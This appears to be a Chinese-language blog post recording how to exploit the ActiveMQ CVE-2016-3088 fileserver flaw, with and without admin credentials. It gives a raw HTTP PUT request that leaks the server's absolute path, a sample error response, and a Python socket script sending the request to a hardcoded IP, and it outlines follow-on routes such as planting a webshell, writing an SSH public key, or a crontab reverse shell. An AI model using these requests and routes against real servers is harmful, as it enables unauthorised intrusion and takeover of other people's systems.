ActiveMQ(CVE-2016-3088)远程代码执行记录

发表于

ActiveMQ(CVE-2016-3088)远程代码执行记录

转载请注明出处:https://youngrichog.github.io/

两种情况:

  1. 有账号密码
  2. 无账号密码

有账号密码

  • webshell

  • ssh public

  • crontab

  • 配合CVE-2015-5254

    ·······

有账号密码的情况下可以拿到绝对路径,访问/admin/test/systemProperties.jsp

img

然后直接PUT,由于fileserver目录不能解析需要MOVE到admin目录,只有登录才能访问

在Apache ActiveMQ 5.7及以下版本,可以通过下面爆绝对路径

1
2
3
4
5
6
7
8
PUT /fileserver/%20/%20 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

img

另外记录一个点,就是写代码的时候遇到的。

请求包

1
2
3
4
5
6
7
8
PUT /fileserver/%20/%20 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

返回包

1
2
3
HTTP/1.1 500 /asd/application_install/apache-activemq-5.9.1/webapps/fileserver/ /  (Not a directory)
Connection: close
Server: Jetty(7.6.9.v20130131)

我想要获取/asd/application_install/apache-activemq-5.9.1/webapps/fileserver/这一部分,用requests不知道用什么获取,后续在看看,然后暂时用socket去获取

1
2
3
4
5
6
7
8
9
10
11
12
#! /usr/bin/env python3
# -*- coding:utf-8 -*-

import socket

sock = socket.socket() 
sock.connect(('ip', 8161)) #修改ip和port
request = 'PUT /fileserver/%20/%20 HTTP/1.0\r\nHost: 149.129.130.83:8161\r\n\r\n'
sock.send(request.encode('utf-8'))
res = sock.recv(4096)
sock.close()
print(res.decode('utf-8'))

img

无账号密码情况

  • ssh public
  • crontab

无账号密码,就只能写个ssh公钥或者计划个反弹shell

简单记录下 :-)